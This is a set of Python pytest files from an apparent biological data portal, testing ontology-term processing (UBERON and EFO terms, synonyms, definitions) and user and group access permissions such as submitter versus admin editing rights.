uri = 'http://www.ebi.ac.uk/efo/EFO0002784'
tid = go.get_termid_from_uri(uri)
assert tid == 'EFO0002784'
@pytest.fixture
def uberon_owler():
return Owler('src/encoded/tests/data/documents/test_uberon.owl')
@pytest.fixture
def uberon_owler2():
return Owler('src/encoded/tests/data/documents/test_uberon2.owl')
@pytest.fixture
def uberon_owler3():
return Owler('src/encoded/tests/data/documents/test_uberon3.owl')
@pytest.fixture
def uberon_owler4():
return Owler('src/encoded/tests/data/documents/test_uberon4.owl')
@pytest.fixture
def ll_class():
return go.convert2URIRef('http://purl.obolibrary.org/obo/UBERON_0000101')
def test_get_term_name_from_rdf_no_name(uberon_owler):
name = go.get_term_name_from_rdf('pickle', uberon_owler)
assert not name
def test_get_term_name_from_rdf_has_name(uberon_owler, ll_class):
name = go.get_term_name_from_rdf(ll_class, uberon_owler)
assert name == 'lobe of lung'
def test_get_term_name_from_rdf_no_term(uberon_owler):
class_ = go.convert2URIRef('http://purl.obolibrary.org/obo/UBERON_0000001')
name = go.get_term_name_from_rdf(class_, uberon_owler)
assert not name
def test_create_term_dict(ll_class, uberon_owler):
with mock.patch('encoded.commands.generate_ontology.get_term_name_from_rdf',
return_value='lung lobe'):
term = go.create_term_dict(ll_class, 'termid', uberon_owler, 'ontid')
assert term['term_name'] == 'lung lobe'
assert term['term_id'] == 'termid'
assert 'ontid' in term['source_ontologies']
assert term['namespace'] == 'http://purl.obolibrary.org/obo'
assert term['term_url'] == 'http://purl.obolibrary.org/obo/UBERON_0000101'
def test_add_term_and_info(uberon_owler2):
testid = 'UBERON:0001772'
relid = 'UBERON:0010304'
for c in uberon_owler2.allclasses:
if go.isBlankNode(c):
test_class = c
parent = go.convert2URIRef('http://purl.obolibrary.org/obo/UBERON_0001772')
terms = go._add_term_and_info(test_class, parent, 'test_rel', uberon_owler2, {})
assert testid in terms
term = terms[testid]
assert term['term_id'] == testid
assert relid in term['test_rel']
def test_process_intersection_of(uberon_owler3):
terms = {}
for c in uberon_owler3.allclasses:
for i in uberon_owler3.rdfGraph.objects(c, go.IntersectionOf):
terms = go.process_intersection_of(c, i, uberon_owler3, terms)
assert len(terms) == 1
term = list(terms.values())[0]
assert len(term['relationships']) == 1
assert term['relationships'][0] == 'UBERON:1'
assert len(term['develops_from']) == 1
assert term['develops_from'][0] == 'UBERON:2'
def test_process_blank_node(uberon_owler3):
terms = {}
for c in uberon_owler3.allclasses:
terms = go.process_blank_node(c, uberon_owler3, terms)
assert len(terms) == 1
assert 'UBERON:0001772' in terms
def test_find_and_add_parent_of(uberon_owler4):
tid = 'CL:0002553'
terms = {tid: {'term_id': tid}}
relids = ['UBERON:0002048', 'OBI:0000456', 'CL:0000058', 'CL:0000133']
relation = None
seen = False
for c in uberon_owler4.allclasses:
for _, p in enumerate(uberon_owler4.get_classDirectSupers(c, excludeBnodes=False)):
if go.isBlankNode(p):
has_part = False
if not seen:
has_part = True
seen = True
terms = go._find_and_add_parent_of(p, c, uberon_owler4, terms, has_part, relation)
assert len(terms) == 2
print(terms)
for termid, term in terms.items():
if termid == tid:
assert len(term['relationships']) == 3
for t in term['relationships']:
assert t in relids
else:
assert termid in relids
assert len(term['has_part_inverse']) == 1
assert term['has_part_inverse'][0] == tid
def test_process_parents(uberon_owler4):
tids = ['CL:0002553', 'CL:0000058']
relids = ['OBI:0000456', 'UBERON:0002048']
terms = {tids[0]: {'term_id': tids[0]}}
for c in uberon_owler4.allclasses:
terms = go.process_parents(c, uberon_owler4, terms)
print(terms)
assert len(terms) == 2
term1 = terms[tids[0]]
term2 = terms[tids[1]]
assert term1['develops_from'][0] == 'CL:0000133'
assert term1['parents'][0] == 'UBERON:0010313'
assert len(term1['relationships']) == 2
for r in relids:
assert r in term1['relationships']
assert term2['has_part_inverse'][0] == tids[0]
@pytest.fixture
def terms_w_stuff():
return {
'term1': {
'term_id': 't1',
'term_name': 'term1',
'relationships': ['rel1', 'rel2'],
'all_parents': ['p'],
'development': 'd',
'has_part_inverse': [],
'develops_from': '',
'part_of': ['p1'],
'closure': [],
'closure_with_develops_from': None
},
'term2': {
'term_id': 't1',
'term_name': 'term1'
},
'term3': {},
'term4': None
}
def test_cleanup_non_fields(terms_w_stuff):
to_delete = ['relationships', 'all_parents', 'development',
'has_part_inverse', 'develops_from', 'part_of',
'closure', 'closure_with_develops_from']
to_keep = ['term_id', 'term_name']
for d in to_delete + to_keep:
assert d in terms_w_stuff['term1']
terms = go._cleanup_non_fields(terms_w_stuff)
assert len(terms) == 2
assert terms['term1'] == terms['term2']
for d in to_delete:
assert d not in terms['term1']
for k in to_keep:
assert k in terms['term1']
@pytest.yield_fixture
def mock_get_synonyms():
syn_lists = [[], ['syn1'], ['syn1', 'syn2']]
with mock.patch('encoded.commands.generate_ontology.get_synonyms', side_effect=syn_lists) as mocked:
yield mocked
@pytest.yield_fixture
def mock_get_definitions():
def_lists = [[], ['def1'], ['def1', 'def2']]
with mock.patch('encoded.commands.generate_ontology.get_synonyms', side_effect=def_lists) as mocked:
yield mocked
@pytest.fixture
def simple_terms():
terms = {'t1': {'term_id': 't1', 'term_url': 'term1'},
't2': {'term_id': 't2', 'term_url': 'term2'},
't3': {'term_id': 't3', 'term_url': 'term3'}}
return OrderedDict(sorted(terms.items(), key=lambda t: t[0]))
def test_add_additional_term_info(simple_terms):
syn_lists = [[], ['syn1'], ['syn1', 'syn2']]
def_lists = [[], ['def1'], ['def1', 'def2']]
# terms = {'t1': {'term_id': 't1', 'term_url': 'term1'},
# 't2': {'term_id': 't2', 'term_url': 'term2'},
# 't3': {'term_id': 't3', 'term_url': 'term3'}}
# terms = OrderedDict(sorted(terms.items(), key=lambda t: t[0]))
with mock.patch('encoded.commands.generate_ontology.convert2URIRef', return_value='blah'):
with mock.patch('encoded.commands.generate_ontology.get_synonyms', side_effect=syn_lists):
with mock.patch('encoded.commands.generate_ontology.get_definitions', side_effect=def_lists):
result = go.add_additional_term_info(simple_terms, 'data', 'synterms', 'defterms')
for tid, term in result.items():
if tid == 't3':
assert 'UNK' in term['definitions']
assert 'def1' in term['definitions']['UNK']
assert 'def2' in term['definitions']['UNK']
assert len(term['synonyms']) == 2
assert 'syn1' in term['synonyms']
assert 'syn2' in term['synonyms']
elif tid == 't2':
assert 'UNK' in term['definitions']
assert 'def1' in term['definitions']['UNK']
assert len(term['synonyms']) == 1
assert term['synonyms'][0] == 'syn1'
else:
assert 'synonyms' not in term
assert 'definition' not in term
def test_write_outfile_pretty(simple_terms):
filename = 'tmp_test_file'
go.write_outfile(list(simple_terms.values()), filename, pretty=True)
infile = open(filename, 'r')
result = json.load(infile)
print(result)
for r in result:
assert r in simple_terms.values()
os.remove(filename)
def test_write_outfile_notpretty(simple_terms):
print(simple_terms)
filename = 'tmp_test_file'
go.write_outfile(list(simple_terms.values()), filename)
with open(filename, 'r') as infile:
for l in infile:
result = json.loads(l)
for v in simple_terms.values():
assert v in result
os.remove(filename)
@pytest.fixture
def ontology_list():
return [
{'uuid': '1', 'ontology_name': 'ont1', 'ontology_prefix': 'TO'},
{'uuid': '2', 'ontology_name': 'ont2', 'ontology_prefix': 'NN'}
]
@pytest.fixture
def matches(ontology_list):
return [
{'term_id': 'TO:t1', 'a': 1, 'b': 2, 'c': 3, 'source_ontologies': [ontology_list[0].get('uuid')]},
{'term_id': 'TO:t1', 'a': 1, 'b': 2, 'c': 3, 'source_ontologies': [ontology_list[0].get('uuid')]}
]
def test_terms_match_identical(matches):
assert go._terms_match(matches[0], matches[1])
def test_terms_match_w_parents(matches):
t1 = matches[0]
t2 = matches[1]
p1 = ['OBI:01', 'EFO:01']
p2 = [{'@id': '/ontology-terms/OBI:01/', 'display_title': 'blah'},
{'@id': '/ontology-terms/EFO:01/', 'display_title': 'hah'}]
t1['parents'] = p1
t2['parents'] = p2
assert go._terms_match(t1, t2)
def test_terms_match_unmatched_parents_1(matches):
t1 = matches[0]
t2 = matches[1]
p1 = ['OBI:01', 'EFO:01']
p2 = [{'@id': '/ontology-terms/OBI:01/', 'display_title': 'blah'}]
t1['parents'] = p1
t2['parents'] = p2
assert not go._terms_match(t1, t2)
def test_terms_match_unmatched_parents_2(matches):
t1 = matches[0]
t2 = matches[1]
p1 = ['OBI:01', 'EFO:01']
p2 = [{'@id': '/ontology-terms/OBI:01/', 'display_title': 'blah'},
{'@id': '/ontology-terms/EFO:02/', 'display_title': 'hah'}]
t1['parents'] = p1
t2['parents'] = p2
assert not go._terms_match(t1, t2)
def test_terms_match_w_ontology(matches):
t1 = matches[0]
t2 = matches[1]
o1 = '530016bc-8535-4448-903e-854af460b254'
o2 = {'@id': '/ontologys/530016bc-8535-4448-903e-854af460b254/', 'display_title': 'blah'}
t1['source_ontologies'] = [o1]
t2['source_ontologies'] = [o2]
assert go._terms_match(t1, t2)
@pytest.fixture
def ont_terms(matches, ontology_list):
t2 = matches[1]
t2['term_id'] = 'TO:t2'
t2['parents'] = ['OBI:01', 'EFO:01']
return {
'TO:t1': matches[0],
'TO:t2': t2,
'NN:t3': {'term_id': 'NN:t3', 'x': 7, 'y': 8, 'z': 9, 'source_ontologies': [ontology_list[1]]}
}
@pytest.fixture
def db_terms(ont_terms):
db_terms = ont_terms.copy()
db_terms['TO:t1']['uuid'] = '1234'
db_terms['TO:t2']['uuid'] = '5678'
del db_terms['TO:t2']['parents']
del db_terms['NN:t3']
for v in db_terms.values():
v.update({'status': 'released'})
return db_terms
def test_id_post_and_patch_filter(ont_terms, db_terms, ontology_list):
result = go.id_post_and_patch(ont_terms, db_terms, ontology_list)
assert len(result) == 1
assert 'NN:t3' == result[0].get('term_id')
# assert len(idmap) == 3
# for k, v in idmap.items():
# assert k in ['t1', 't2', 't3']
# if k != 't3': # t1 and t2 already had uuids
# assert v in ['1234', '5678']
def test_id_post_and_patch_no_filter(ont_terms, db_terms, ontology_list):
tids = ['TO:t1', 'TO:t2', 'NN:t3']
result = go.id_post_and_patch(ont_terms, db_terms, ontology_list, False)
assert len(result) == 3
for t in result:
# assert t.get('term_id') in idmap
assert t.get('term_id') in tids
def test_id_post_and_patch_id_obs(ont_terms, db_terms, ontology_list):
db_terms['TO:t4'] = {
'term_id': 'TO:t4',
'source_ontologies': [{'uuid': '1', 'ontology_name': 'ont1', 'ontology_prefix': 'TO'}],
'uuid': '7890',
'status': 'released'}
result = go.id_post_and_patch(ont_terms, db_terms, ontology_list)
assert len(result) == 2
assert '7890' in [t.get('uuid') for t in result]
# assert 't4' in idmap
def test_id_post_and_patch_id_obs_simple(ont_terms, db_terms, ontology_list):
db_terms['TO:t4'] = {
'term_id': 'TO:t4',
'source_ontologies': [{'uuid': '1', 'ontology_name': 'ont1', 'ontology_prefix': 'TO'}],
'uuid': '7890',
'status': 'released'}
result = go.id_post_and_patch(ont_terms, db_terms, ontology_list, ontarg='1', simple=True)
assert len(result) == 2
assert '7890' in [t.get('uuid') for t in result]
def test_id_post_and_patch_donot_obs(ont_terms, db_terms, ontology_list):
db_terms['t4'] = {'term_id': 't4', 'source_ontologies': {'uuid': '1', 'ontology_name': 'ont1'}, 'uuid': '7890'}
result = go.id_post_and_patch(ont_terms, db_terms, ontology_list, True, False)
assert 't4' not in [t.get('term_id') for t in result]
# assert 't4' not in idmap
# def test_id_post_and_patch_ignore_4dn(ont_terms, db_terms, ontology_list):
# db_terms['t4'] = {'term_id': 't4', 'source_ontologies': {'uuid': '4', 'ontology_name': '4DN ont'}, 'uuid': '7890'}
# result = go.id_post_and_patch(ont_terms, db_terms, ontology_list)
# print(result)
# assert 't4' not in [t.get('term_id') for t in result]
# # assert 't4' not in idmap
def valid_uuid(uid):
validchars = '0123456789abcdef'
uid = uid.replace('-', '')
if len(uid) != 32:
return False
for c in uid:
if c not in validchars:
return False
return True
@pytest.fixture
def embedded_dbterm():
return {
"synonyms": [
"renal pelvis uroepithelium",
"renal pelvis transitional epithelium",
"pelvis of ureter uroepithelium",
"renal pelvis urothelium",
"kidney pelvis uroepithelium",
"uroepithelium of pelvis of ureter",
"urothelium of pelvis of ureter",
"uroepithelium of kidney pelvis",
"transitional epithelium of kidney pelvis",
"transitional epithelium of renal pelvis",
"urothelium of kidney pelvis",
"uroepithelium of renal pelvis",
"urothelium of renal pelvis",
"kidney pelvis transitional epithelium",
"pelvis of ureter urothelium"
],
"preferred_name": "kidney pelvis urothelium",
"references": [
],
"external_references": [
],
"status": "released",
"term_name": "kidney pelvis urothelium",
"submitted_by": {
"principals_allowed": {
"edit": [
"group.admin",
"userid.986b362f-4eb6-4a9c-8173-3ab267307e3a"
],
"view": [
"group.admin",
"group.read-only-admin",
"remoteuser.EMBED",
"remoteuser.INDEXER",
"userid.986b362f-4eb6-4a9c-8173-3ab267307e3a"
]
},
"@id": "/users/986b362f-4eb6-4a9c-8173-3ab267307e3a/",
"@type": [
"User",
"Item"
],
"uuid": "986b362f-4eb6-4a9c-8173-3ab267307e3a",
"display_title": "4dn DCIC"
},
"display_title": "kidney pelvis urothelium",
"schema_version": "1",
"@type": [
"OntologyTerm",
"Item"
],
"parents": [
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"@id": "/ontology-terms/UBERON:0001254/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "38dbff69-aac7-46a4-837e-7340c2c5bcd5",
"display_title": "urothelium of ureter"
},
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"@id": "/ontology-terms/UBERON:0004819/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "57ac2905-0533-43c9-988b-9add8c225a78",
"display_title": "kidney epithelium"
}
],
"date_created": "2017-05-11T16:00:51.747446+00:00",
"term_id": "UBERON:0004788",
"source_ontology": {
"uuid": "530016bc-8535-4448-903e-854af460b254",
"display_title": "Uberon",
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"@id": "/ontologys/530016bc-8535-4448-903e-854af460b254/",
"@type": [
"Ontology",
"Item"
],
"ontology_name": "Uberon"
},
"uuid": "e5e1690a-1a80-4e50-a3cf-58f2f269abd8",
"term_url": "http://purl.obolibrary.org/obo/UBERON_0004788",
"last_modified": {
"date_modified": "2018-07-11T05:05:30.826642+00:00",
"modified_by": {
"principals_allowed": {
"edit": [
"group.admin",
"userid.986b362f-4eb6-4a9c-8173-3ab267307e3a"
],
"view": [
"group.admin",
"group.read-only-admin",
"remoteuser.EMBED",
"remoteuser.INDEXER",
"userid.986b362f-4eb6-4a9c-8173-3ab267307e3a"
]
},
"@id": "/users/986b362f-4eb6-4a9c-8173-3ab267307e3a/",
"@type": [
"User",
"Item"
],
"uuid": "986b362f-4eb6-4a9c-8173-3ab267307e3a",
"display_title": "4dn DCIC"
}
},
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"@id": "/ontology-terms/UBERON:0004788/",
"slim_terms": [
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"term_name": "endoderm",
"display_title": "endoderm",
"is_slim_for": "developmental",
"@id": "/ontology-terms/UBERON:0000925/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "111121bc-8535-4448-903e-854af460a233"
},
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"term_name": "kidney",
"display_title": "kidney",
"is_slim_for": "organ",
"@id": "/ontology-terms/UBERON:0002113/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "111167bc-8535-4448-903e-854af460a233"
},
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"term_name": "ureter",
"display_title": "ureter",
"is_slim_for": "organ",
"@id": "/ontology-terms/UBERON:0000056/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "111148bc-8535-4448-903e-854af460a233"
},
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"term_name": "renal system",
"display_title": "renal system",
"is_slim_for": "system",
"@id": "/ontology-terms/UBERON:0001008/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "111130bc-8535-4448-903e-854af460a233"
},
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"term_name": "mesoderm",
"display_title": "mesoderm",
"is_slim_for": "developmental",
"@id": "/ontology-terms/UBERON:0000926/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "111120bc-8535-4448-903e-854af460a233"
}
],
"namespace": "http://purl.obolibrary.org/obo",
"definition": "the epithelial lining of the luminal space of the kidney pelvis"
}
def test_get_raw_form(embedded_dbterm):
raw_term = go.get_raw_form(embedded_dbterm)
print(raw_term)
def test_update_definition():
prefix = 'EFO'
tdef = 'here is EFO definition (EFO)'
dbdef = 'here is outdated definition (EFO, OBI) and another def (SO)'
newdef = go.update_definition(tdef, dbdef, prefix)
assert tdef in newdef
assert 'here is outdated definition (EFO, OBI)' not in newdef
```
#### File: encoded/tests/test_permissions.py
```python
import pytest
import webtest
from datetime import date
from urllib.parse import urlencode
from ..types.lab import Lab
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def remc_lab(testapp):
item = {
'name': 'remc-lab',
'title': 'REMC lab',
'status': 'current'
}
return testapp.post_json('/lab', item).json['@graph'][0]
@pytest.fixture
def somelab_w_shared_award(testapp, award):
item = {
'name': 'some-lab',
'title': 'SOME lab',
'status': 'current',
'awards': [award['@id']]
}
return testapp.post_json('/lab', item).json['@graph'][0]
@pytest.fixture
def remc_award(testapp):
item = {
'name': 'remc-award',
'description': 'REMC test award',
'viewing_group': 'Not 4DN',
}
return testapp.post_json('/award', item).json['@graph'][0]
@pytest.fixture
def nofic_award(testapp):
item = {
'name': 'NOFIC-award',
'description': 'NOFIC test award',
'viewing_group': 'NOFIC',
}
return testapp.post_json('/award', item).json['@graph'][0]
@pytest.fixture
def wrangler(testapp):
item = {
'first_name': 'Wrangler',
'last_name': 'Admin',
'email': '<EMAIL>',
'groups': ['admin'],
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def lab_viewer(testapp, lab, award):
item = {
'first_name': 'ENCODE',
'last_name': '<NAME>',
'email': '<EMAIL>',
'lab': lab['name'],
'status': 'current',
'viewing_groups': [award['viewing_group']]
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def award_viewer(testapp, somelab_w_shared_award):
item = {
'first_name': 'SOME',
'last_name': '<NAME>',
'email': '<EMAIL>',
'lab': somelab_w_shared_award['@id'],
'status': 'current',
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
# this user has the 4DN viewing group
@pytest.fixture
def viewing_group_member(testapp, award):
item = {
'first_name': 'Viewing',
'last_name': 'Group',
'email': '<EMAIL>',
'viewing_groups': [award['viewing_group']],
'status': 'current'
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
# this user has the NOFIC viewing group
@pytest.fixture
def nofic_group_member(testapp, nofic_award):
item = {
'first_name': 'NOFIC',
'last_name': 'Group',
'email': '<EMAIL>',
'viewing_groups': [nofic_award['viewing_group']],
'status': 'current'
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def multi_viewing_group_member(testapp, award, nofic_award):
item = {
'first_name': 'Viewing',
'last_name': 'Group',
'email': '<EMAIL>',
'viewing_groups': [award['viewing_group'], nofic_award['viewing_group']],
'status': 'current'
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def remc_submitter(testapp, remc_lab, remc_award):
item = {
'first_name': 'REMC',
'last_name': 'Submitter',
'email': '<EMAIL>',
'submits_for': [remc_lab['@id']],
'viewing_groups': [remc_award['viewing_group']],
'status': 'current'
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
def remote_user_testapp(app, remote_user):
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': str(remote_user),
}
return webtest.TestApp(app, environ)
@pytest.fixture
def revoked_user(testapp, lab, award):
item = {
'first_name': 'ENCODE',
'last_name': 'Submitter',
'email': '<EMAIL>',
'submits_for': [lab['@id']],
'status': 'revoked',
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def other_lab(testapp):
item = {
'title': 'Other lab',
'name': 'other-lab',
}
return testapp.post_json('/lab', item, status=201).json['@graph'][0]
@pytest.fixture
def simple_file(testapp, lab, award, file_formats):
item = {
'uuid': '3413218c-3d86-498b-a0a2-9a406638e777',
'file_format': file_formats.get('fastq').get('@id'),
'paired_end': '1',
'lab': lab['@id'],
'award': award['@id'],
'status': 'uploaded', # avoid s3 upload codepath
}
return testapp.post_json('/file_fastq', item).json['@graph'][0]
@pytest.fixture
def step_run(testapp, lab, award):
software = {
'name': 'do-thing',
'description': 'It does the thing',
'title': 'THING_DOER',
'version': '1.0',
'software_type': "normalizer",
'award': award['@id'],
'lab': lab['@id']
}
sw = testapp.post_json('/software', software, status=201).json['@graph'][0]
analysis_step = {
'name': 'do-thing-step',
'version': 1,
'software_used': sw['@id']
}
return testapp.post_json('/analysis-steps', analysis_step, status=201).json['@graph'][0]
@pytest.fixture
def expt_w_cont_lab_item(lab, remc_lab, award, human_biosample, exp_types):
return {
'lab': lab['@id'],
'award': award['@id'],
'biosample': human_biosample['@id'],
'experiment_type': exp_types['microc']['@id'],
'contributing_labs': [remc_lab['@id']]
}
@pytest.fixture
def wrangler_testapp(wrangler, app, external_tx, zsa_savepoints):
return remote_user_testapp(app, wrangler['uuid'])
@pytest.fixture
def remc_member_testapp(remc_submitter, app, external_tx, zsa_savepoints):
return remote_user_testapp(app, remc_submitter['uuid'])
@pytest.fixture
def submitter_testapp(submitter, app, external_tx, zsa_savepoints):
return remote_user_testapp(app, submitter['uuid'])
@pytest.fixture
def lab_viewer_testapp(lab_viewer, app, external_tx, zsa_savepoints):
return remote_user_testapp(app, lab_viewer['uuid'])
@pytest.fixture
def award_viewer_testapp(award_viewer, app, external_tx, zsa_savepoints):
return remote_user_testapp(app, award_viewer['uuid'])
@pytest.fixture
def viewing_group_member_testapp(viewing_group_member, app, external_tx, zsa_savepoints):
# app for 4DN viewing group member
return remote_user_testapp(app, viewing_group_member['uuid'])
@pytest.fixture
def multi_viewing_group_member_testapp(multi_viewing_group_member, app, external_tx, zsa_savepoints):
# app with both 4DN and NOFIC viewing group
return remote_user_testapp(app, multi_viewing_group_member['uuid'])
@pytest.fixture
def nofic_group_member_testapp(nofic_group_member, app, external_tx, zsa_savepoints):
# app for 4DN viewing group member
return remote_user_testapp(app, nofic_group_member['uuid'])
@pytest.fixture
def indexer_testapp(app, external_tx, zsa_savepoints):
return remote_user_testapp(app, 'INDEXER')
@pytest.fixture
def iwg_member(testapp):
item = {
'first_name': 'IWG',
'last_name': 'Member',
'email': '<EMAIL>',
'viewing_groups': ['IWG'],
'status': 'current'
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def arbitrary_group_member_testapp(iwg_member, app, external_tx, zsa_savepoints):
# app for arbitrary viewing_group member
return remote_user_testapp(app, iwg_member['uuid'])
@pytest.fixture
def bs_item(lab, award):
return {
'biosource_type': 'primary cell',
'lab': lab['@id'],
'award': award['@id'],
'status': 'submission in progress'
}
vg_test_stati = ['planned', 'submission in progress', 'pre-release']
@pytest.mark.parametrize('status', vg_test_stati)
def test_arbitrary_viewing_group_can_view_item_w_viewable_by(
testapp, arbitrary_group_member_testapp, bs_item, iwg_member, status):
# post the item - the award has the 4DN viewing group and nothing related to IWG
bsres = testapp.post_json('/biosource', bs_item, status=201).json['@graph'][0]
# the vg testapp should not be able to get this item
arbitrary_group_member_testapp.get(bsres['@id'], status=403)
# now add viewable by property to the item
vgres = testapp.patch_json(bsres['@id'], {'viewable_by': ['IWG'], "status": status}, status=200)
# now should be able to get for each of the statuses
arbitrary_group_member_testapp.get(vgres.json['@graph'][0]['@id'], status=200)
@pytest.mark.parametrize('status', vg_test_stati)
def test_user_w_vg_cannot_view_item_w_vg_from_award(
testapp, remc_member_testapp, remc_award, bs_item, status):
""" For stati - planned, submission in progress, and pre-release - test that an item
does not have viewing_group prinicipal added via the award so the item cannot be
viewed - this tests for an arbitrary viewing_group, there are other tests for the
special handling of NOFIC and JA items, this test is not for those special cases
"""
bs_item['award'] = remc_award['@id'] # iwg award has 'not 4DN' vg as does the remc_submitter in the remc app
res = testapp.post_json('/biosource', bs_item, status=201).json['@graph'][0]
remc_member_testapp.get(res['@id'], status=403)
def test_wrangler_post_non_lab_collection(wrangler_testapp):
item = {
'name': 'human',
'scientific_name': 'Homo sapiens',
'taxon_id': '9606',
}
return wrangler_testapp.post_json('/organism', item, status=201)
def test_submitter_cant_post_non_lab_collection(submitter_testapp):
item = {
'name': 'human',
'scientific_name': 'Homo sapiens',
'taxon_id': '9606',
}
return submitter_testapp.post_json('/organism', item, status=403)
def test_submitter_post_update_experiment(submitter_testapp, lab, award, human_biosample, exp_types):
experiment = {'lab': lab['@id'], 'award': award['@id'],
'experiment_type': exp_types['microc']['@id'], 'biosample': human_biosample['@id']}
res = submitter_testapp.post_json('/experiments-hi-c', experiment, status=201)
location = res.location
res = submitter_testapp.get(location + '@@testing-allowed?permission=edit', status=200)
assert res.json['has_permission'] is True
assert 'submits_for.%s' % lab['uuid'] in res.json['principals_allowed_by_permission']
submitter_testapp.patch_json(location, {'description': 'My experiment'}, status=200)
def test_submitter_cant_post_other_lab(submitter_testapp, other_lab, award, exp_types):
experiment = {'lab': other_lab['@id'], 'award': award['@id'], 'experiment_type': exp_types['microc']['@id']}
res = submitter_testapp.post_json('/experiments-hi-c', experiment, status=422)
assert res.json['errors'][0]['name'] == 'Schema: lab'
assert "not in user submits_for" in res.json['errors'][0]['description']
def test_wrangler_post_other_lab(wrangler_testapp, other_lab, award, human_biosample, exp_types):
experiment = {'lab': other_lab['@id'], 'award': award['@id'],
'experiment_type': exp_types['microc']['@id'], 'biosample': human_biosample['@id']}
wrangler_testapp.post_json('/experiments-hi-c', experiment, status=201)
def test_submitter_view_experiement(submitter_testapp, submitter, lab, award, human_biosample, exp_types):
experiment = {'lab': lab['@id'], 'award': award['@id'],
'experiment_type': exp_types['microc']['@id'], 'biosample': human_biosample['@id']}
res = submitter_testapp.post_json('/experiments-hi-c', experiment, status=201)
submitter_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_user_view_details_admin(submitter, access_key, testapp):
res = testapp.get(submitter['@id'])
assert 'email' in res.json
def test_users_view_details_self(submitter, access_key, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
assert 'email' in res.json
def test_users_patch_self(submitter, access_key, submitter_testapp):
submitter_testapp.patch_json(submitter['@id'], {})
def test_users_post_disallowed(submitter, access_key, submitter_testapp):
item = {
'first_name': 'ENCODE',
'last_name': 'Submitter2',
'email': '<EMAIL>',
}
submitter_testapp.post_json('/user', item, status=403)
def test_users_cannot_view_other_users_info_with_basic_authenticated(submitter, authenticated_testapp):
authenticated_testapp.get(submitter['@id'], status=403)
def test_users_can_see_their_own_user_info(submitter, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
assert 'title' in res.json
assert 'email' in res.json
def test_users_view_basic_anon(submitter, anontestapp):
anontestapp.get(submitter['@id'], status=403)
def test_users_view_basic_indexer(submitter, indexer_testapp):
res = indexer_testapp.get(submitter['@id'])
assert 'title' in res.json
assert 'email' not in res.json
assert 'access_keys' not in res.json
def test_viewing_group_member_view(viewing_group_member_testapp, experiment_project_release):
return viewing_group_member_testapp.get(experiment_project_release['@id'], status=200)
def test_lab_viewer_view(lab_viewer_testapp, experiment):
lab_viewer_testapp.get(experiment['@id'], status=200)
def test_award_viewer_view(award_viewer_testapp, experiment):
award_viewer_testapp.get(experiment['@id'], status=200)
def test_submitter_patch_lab_disallowed(submitter, other_lab, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
lab = {'lab': other_lab['@id']}
submitter_testapp.patch_json(res.json['@id'], lab, status=422) # is that the right status?
def test_wrangler_patch_lab_allowed(submitter, other_lab, wrangler_testapp):
res = wrangler_testapp.get(submitter['@id'])
lab = {'lab': other_lab['@id']}
wrangler_testapp.patch_json(res.json['@id'], lab, status=200)
def test_submitter_patch_submits_for_disallowed(submitter, other_lab, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
submits_for = {'submits_for': [res.json['submits_for'][0]['@id']] + [other_lab['@id']]}
submitter_testapp.patch_json(res.json['@id'], submits_for, status=422)
def test_wrangler_patch_submits_for_allowed(submitter, other_lab, wrangler_testapp):
res = wrangler_testapp.get(submitter['@id'])
submits_for = {'submits_for': [res.json['submits_for'][0]['@id']] + [other_lab['@id']]}
wrangler_testapp.patch_json(res.json['@id'], submits_for, status=200)
def test_submitter_patch_groups_disallowed(submitter, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
groups = {'groups': res.json.get('groups', []) + ['admin']}
submitter_testapp.patch_json(res.json['@id'], groups, status=422)
def test_wrangler_patch_groups_allowed(submitter, other_lab, wrangler_testapp):
res = wrangler_testapp.get(submitter['@id'])
groups = {'groups': res.json.get('groups', []) + ['admin']}
wrangler_testapp.patch_json(res.json['@id'], groups, status=200)
def test_submitter_patch_viewing_groups_disallowed(submitter, other_lab, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
vgroups = {'viewing_groups': res.json['viewing_groups'] + ['GGR']}
submitter_testapp.patch_json(res.json['@id'], vgroups, status=422)
def test_wrangler_patch_viewing_groups_allowed(submitter, wrangler_testapp):
